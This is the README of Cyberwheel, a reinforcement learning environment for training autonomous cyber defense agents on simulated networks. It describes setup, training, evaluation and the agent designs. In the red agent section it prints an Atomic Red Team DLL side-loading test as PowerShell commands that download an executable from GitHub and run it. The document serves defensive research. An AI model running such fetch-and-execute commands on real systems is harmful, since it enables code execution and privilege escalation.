
Cyberwheel

A reinforcement learning simulation environment focused on autonomous cyber defense


Table of Contents
  1. About Cyberwheel
  2. Getting Started
  3. Usage
  4. License
  5. Contacts

About Cyberwheel

Cyberwheel is a Reinforcement Learning (RL) simulation environment built for training and evaluating autonomous cyber defense models on simulated networks. It was designed with modularity in mind, allowing users to build on top of it to fit their needs. It supports a robust set of configuration files for defining networks, services, host types, defensive agents, and more.

Motivations:

This environment contains a training script and an evaluation script with a large set of configurable parameters to switch out networks, strategies, episode lengths, and more. It also contains a script to run a dash server that allows evaluations to be visualized in a readable graph display showing agent actions throughout the episodes.

(back to top)

Built With

(back to top)

Getting Started

Prerequisites

This project runs on, and has been tested with, Python 3.10. Once installed, poetry should automatically use this version for its virtual environment.

Cyberwheel uses poetry to manage and install Python packages. For instructions on how to install poetry, visit their installation page.

For the dash server visualization to function, you need graphviz, an open-source graph visualization tool, installed on your system.

Instructions for installing graphviz can be found in their documentation.

Installation

Once all dependencies are installed:

  1. If you haven't already, clone the cyberwheel repo with HTTPS
    git clone https://github.com/ORNL/cyberwheel.git

    or with SSH:

    git clone git@github.com:ORNL/cyberwheel.git
  2. Install packages and resolve dependencies
    poetry install

On newer macOS systems running on Apple silicon, there may be an error installing the pygraphviz package, with poetry not finding the graphviz configuration files. You can work around this by pip installing the pygraphviz package manually inside the poetry environment, explicitly passing the graphviz include and library paths; the pygraphviz installation documentation walks through this for Homebrew installs of graphviz.

(back to top)

Usage

To run any cyberwheel scripts, shell into the poetry virtual environment:

poetry shell

When you want to deactivate the environment, you can just hit Ctrl+D. This will exit the virtual environment shell.

Training a model

To train a model on our environment, you can use our training script, train_cyberwheel.py:

python3 train_cyberwheel.py

This will run training with default parameters. It will save the model during evaluations in the models/ directory. If tracking with Weights & Biases, the model and its checkpoints will be saved to your W&B project as well as locally. You can also view real-time training progress on your W&B account.

The script also includes a wide array of configuration options as arguments that can be passed.

Training Parameters

Environment Parameters

Reinforcement Learning Parameters

(back to top)

Evaluating a model

To evaluate a trained model with Cyberwheel, you can use our evaluation script, evaluate_cyberwheel.py:

python3 evaluate_cyberwheel.py --experiment [exp-name]

This will run evaluation with default parameters on a trained model, identified by its experiment name. It will load the model from the models/ directory. If tracked with Weights & Biases, the model and its checkpoints can also be loaded from your W&B project.

The script also includes a wide array of configuration options as arguments that can be passed.

Evaluation Parameters

(back to top)

Visualization

To view the visualizations of the evaluations that were run, you can run the visualization script:

python3 run_visualization_server.py [PORT_NUM]

This will run a dash server locally on the port number passed. You can then visit http://localhost:PORT_NUM/ to access the frontend. From here, you can find the evaluation you ran in the list, and view the network state over the course of each episode with a step slider.

Visualizer GIF

Running a Basic Demo

A basic demonstration of the code can be executed with the following commands:

  1. Train a model and save subsequent model checkpoints in the models/ directory

    python3 train_cyberwheel.py --exp-name example_demo
  2. Evaluate the most recent save of the model example_demo on the environment, and write a log of the actions at each step to the action_logs/ directory. If you pass --visualize, it will also save graph objects to the graphs/ directory, which are needed for visualizing with our dash server. (NOTE: visualizing can take some time)

    python3 evaluate_cyberwheel.py --experiment example_demo [--visualize]
  3. Run the visualization server on port 8080. When running locally, you can navigate to http://localhost:8080/ on your browser and it should include your experiment name in the list, allowing you to visualize the agent's actions throughout an episode.

    python3 run_visualization_server.py 8080

Cyberwheel Design

Network Design

Networks in Cyberwheel consist of routers, subnets, and hosts, represented as nodes in a networkx graph.
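
As a rough illustration of that structure (the node names and attributes below are made up and do not reflect cyberwheel's actual classes), a tiny topology could be sketched directly in networkx like this:

```python
# Minimal, illustrative sketch of the router/subnet/host topology idea using
# networkx directly. The node names and attributes are hypothetical --
# cyberwheel's own Network classes wrap and manage this structure.
import networkx as nx

G = nx.Graph()

# One router, one subnet, two hosts (names are made up for illustration).
G.add_node("core_router", type="router")
G.add_node("user_subnet", type="subnet")
G.add_node("user_host_0", type="host", os="windows")
G.add_node("user_host_1", type="host", os="linux")

# Routers connect to subnets; subnets connect to their hosts.
G.add_edge("core_router", "user_subnet")
G.add_edge("user_subnet", "user_host_0")
G.add_edge("user_subnet", "user_host_1")

# Hosts can then be looked up by filtering on node attributes.
hosts = [n for n, d in G.nodes(data=True) if d["type"] == "host"]
print(hosts)  # ['user_host_0', 'user_host_1']
```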

Blue Agent Design

The blue agent is largely focused on deploying Decoys to slow and/or stop red agent attacks throughout the network. The blue agent's actions and logic can be configured and defined in a YAML file, allowing for greater modularity.
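
As a hedged sketch of what a YAML-driven blue agent definition could look like (the keys below are hypothetical and not cyberwheel's actual schema; see the Configurations section below for the real files), the idea is that actions and their parameters live in data rather than code:

```python
# Illustrative only: a made-up blue agent YAML snippet loaded with PyYAML.
# The keys are hypothetical placeholders, not cyberwheel's real config schema.
import yaml

example_config = """
blue_agent:
  actions:
    - name: deploy_decoy
      decoy_type: server_decoy
    - name: remove_decoy
  reward:
    decoy_cost: -1
"""

config = yaml.safe_load(example_config)
for action in config["blue_agent"]["actions"]:
    print(action["name"])  # deploy_decoy, remove_decoy
```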

Red Agent Design

The red agent is a heuristic agent with a set of defined rules and strategies it can use to traverse a network, although the logic that dictates which Hosts it chooses to target is modular. Its actions are mapped from MITRE ATT&CK Killchain Phases (Discovery, Lateral Movement, Privilege Escalation, Impact) to Atomic Red Team (ART) techniques. We've defined these techniques with a set of attributes mapped from existing cyber attack data. This allows our ART Agent to run a higher-level killchain phase (e.g. Discovery) on a host, and the environment will cross-reference the target host's attributes with the ART Technique's attributes, checking the host's OS, the killchain phase, and the relevant CVEs.

If all of these conditions are met, the agent can successfully run the killchain attack on the host. These ART Techniques include Atomic Tests, which give tangible commands to run in order to execute the given attack. With this methodology, the simulator is able to transform a general killchain phase into a valid set of commands that could be run in the real world.
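
The sketch below is a conceptual Python version of this validity check; the dataclasses and attribute names are hypothetical and only illustrate the cross-referencing described above, not cyberwheel's actual implementation.

```python
# Hypothetical sketch of checking whether an ART Technique is valid for a
# killchain phase on a target host (OS, killchain phase, and CVE checks).
from dataclasses import dataclass, field

@dataclass
class Host:
    os: str
    cves: set = field(default_factory=set)

@dataclass
class ARTTechnique:
    name: str
    killchain_phases: set
    supported_os: set
    cve_list: set

def technique_is_valid(technique: ARTTechnique, host: Host, phase: str) -> bool:
    """True if the technique can run this killchain phase on this host."""
    return (
        phase in technique.killchain_phases
        and host.os in technique.supported_os
        # If the technique requires CVEs, the host must have at least one.
        and (not technique.cve_list or bool(technique.cve_list & host.cves))
    )

host = Host(os="windows", cves={"CVE-2021-44228"})
dll_side_loading = ARTTechnique(
    name="DLL Side-Loading",
    killchain_phases={"privilege-escalation"},
    supported_os={"windows"},
    cve_list=set(),
)
print(technique_is_valid(dll_side_loading, host, "privilege-escalation"))  # True
```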

Example

  1. ART Agent runs Privilege Escalation on Host.
  2. ART Agent runs OS, Killchain Phase, and CVE checks.
  3. ART Agent uses ART Technique: DLL Side-Loading
  4. ART Agent chooses a random Atomic Test
  5. Atomic Test adds the following commands to Host metadata:
    New-Item -Type Directory (split-path "${gup_executable}") -ErrorAction ignore | Out-Null
    Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "${gup_executable}"
    if (Test-Path "${gup_executable}") {exit 0} else {exit 1}
    "${gup_executable}"
    taskkill /F /IM ${process_name} >nul 2>&1

Detectors and Alerts

Red actions produce Alerts, which contain information such as the action's source host, target host, exploited services, and techniques. The blue agent has a detector layer that picks up red agent actions on the network and converts them into Alerts. These detectors can filter out Alerts, add noise, or even create false-positive Alerts, and multiple detectors can be used together to capture various red agent behaviors. The resulting Alerts are then converted into the observation space that the RL agent uses to train.
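
The sketch below illustrates the detector idea in a simplified way; the class and field names are hypothetical and are not part of cyberwheel's API.

```python
# Hypothetical detector sketch: takes the "perfect" alerts produced by red
# actions, drops some (imperfect detection), and occasionally injects a
# false-positive alert as noise.
import random
from dataclasses import dataclass

@dataclass
class Alert:
    src_host: str
    dst_host: str
    technique: str

class ProbabilisticDetector:
    """Reports each true alert with some probability and adds random noise."""

    def __init__(self, detect_prob=0.9, false_positive_prob=0.05, hosts=()):
        self.detect_prob = detect_prob
        self.false_positive_prob = false_positive_prob
        self.hosts = list(hosts)

    def observe(self, true_alerts):
        observed = [a for a in true_alerts if random.random() < self.detect_prob]
        if self.hosts and random.random() < self.false_positive_prob:
            # Fabricate a false-positive alert on a random host.
            h = random.choice(self.hosts)
            observed.append(Alert(src_host=h, dst_host=h, technique="noise"))
        return observed

detector = ProbabilisticDetector(hosts=["user_host_0", "user_host_1"])
alerts = [Alert("attacker", "user_host_0", "discovery")]
print(detector.observe(alerts))
```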

Configurations

All configurations are stored in the resources/configs directory. You can use these configs to define blue agents, decoy types, detectors, host types, networks, and services.
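
As a small example (assuming the configs are YAML files, that PyYAML is available in the environment, and that you run from the repository root), you could browse them like this:

```python
# Hedged example: list and parse config files under resources/configs.
# Assumes a .yaml extension; adjust the glob if the repo uses .yml as well.
from pathlib import Path
import yaml

config_root = Path("resources/configs")
for path in sorted(config_root.rglob("*.yaml")):
    with path.open() as f:
        data = yaml.safe_load(f)
    print(path.relative_to(config_root), "->", type(data).__name__)
```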

Contributing

If you are not familiar with SOLID principles, please read this before contributing. Pretty basic, but makes a huge difference down the road --- Article on SOLID.

If you need to add a dependency, this project is packaged with poetry. Please take a few minutes to read about the basics before adding any dependencies. Do not use pip, do not use requirements.txt. TLDR: use poetry add <dependency name>. After adding your dependency, add and commit the new poetry.lock file.

This project uses pre-commit to automatically run formatting prior to every commit. Pyright is included in this suite and will block your commit if your code has type errors. If you'd like to skip this check, run SKIP=pyright git commit <rest of commit command>.

If you need to do anything with the networkx graph, write helper functions in the network module (in the base class where possible) rather than passing the graph around or injecting it wherever possible. Of course, you may still have to inject the network instance, since it holds the state information.

The cyberwheel class that inherits from gym should contain minimal code to keep it clean. If you find yourself writing long code blocks in this file, consider whether they should be moved into another module or class. The same thing goes for the main class --- keep it clean. If you want to add 30 command line args, maybe find a way to parse them using a helper class just to keep that file clean.

Be creative and have fun!

(back to top)

License

Distributed under the MIT License. See LICENSE for more information.

(back to top)

Contacts

Sean Oesch - oeschts@ornl.gov

Cory Watson - watsoncl1@ornl.gov

Amul Chaulagain - chaulagaina@ornl.gov

Matthew Dixson - dixsonmk@ornl.gov

Brian Weber - weberb@ornl.gov

Phillipe Austria - austriaps@ornl.gov

Project Link: https://github.com/ORNL/cyberwheel/

(back to top)

Papers

(2024) Towards a High Fidelity Training Environment for Autonomous Cyber Defense Agents

(2024) The Path to Autonomous Cyber Defense

(back to top)